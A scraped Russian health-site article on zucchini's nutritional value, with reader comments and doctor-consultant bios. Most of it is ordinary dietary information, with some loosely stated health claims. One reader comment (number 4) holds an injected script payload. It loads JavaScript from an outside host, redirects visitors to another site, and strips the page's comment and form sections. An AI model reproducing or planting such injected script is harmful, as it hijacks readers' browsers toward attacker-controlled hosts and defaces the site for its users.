Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Цуккини. Родственник каба...  >>  Цуккини. Родственник кабачка и тыквы
 
Обратная связь
 

Цуккини. Родственник кабачка и тыквы

Размер шрифта
30 января 2012 08:32
  • google_analytics: false
  • Нравится

Цуккини – диетический овощ и идеальный гарнир к мясу. Как правильно выбрать, как хранить и как готовить цуккини.

1

И кабачок, и цуккини принадлежат к семейству тыквенных и являются разновидностью тыквы обыкновенной. В России часто путают кабачок и цуккини, а перезревший цуккини даже называют кабачком.

По содержанию полезных веществ и по своему составу они действительно похожи. Однако не стоит забывать, что это все-таки разные овощные культуры.

В цуккини содержатся:

  • 94-95% воды. Цуккини считаются одними из самых низкокалорийных овощей (кабачок - 16 ккал, цуккини - 16 ккал, тыква - 30 ккал).
  • витамин С, магний и калий. Витамин С обладает противовоспалительными свойствами, поэтому кабачок полезен при астме, остеоартрозе, ревматоидном артрите. Калий и магний – микроэлементы, которые снижают риски сердечно-сосудистых заболеваний.
  • фолаты (производственные фолиевой кислоты) борются с гомоцистеином. Это продукт переработки аминокислоты метионина. Гомоцистеин разрушает стенку сосуда и приводит к образованию атеросклероза.

1

Пьедестал почета по фолатам:

Цуккини – 29 мкг

Кабачки – 23,5 мкг

Огурцы – 7 мкг

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 января 2012 в 18:05

Цитировать   |   Пожаловаться

Цукини - это не отдельный вид овоща, который разновидность тыквы, это - сорт кабачка! И его калорийность - 27 ккал.

2 - Гость

31 января 2012 в 12:11

Цитировать   |   Пожаловаться

в начале статьи написано: "Цуккини – диетический овощ и идеальный гарнир к мясу. Как правильно выбрать, как хранить и как готовить цуккини"

Ну и где же про как выбрать, как хранить, как готовить?

Гость 31 января 2012 в 12:11
Как правильно выбрать, как хранить и как готовить цуккини
 Эти сведения были в видео-сюжете программы. Рецепты блюд с цуккини Вы сможете найти, если на главной странице в строке поиска наберете слово "Цуккини". 

4 - zzzzzz

30 июня 2015 в 23:58

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.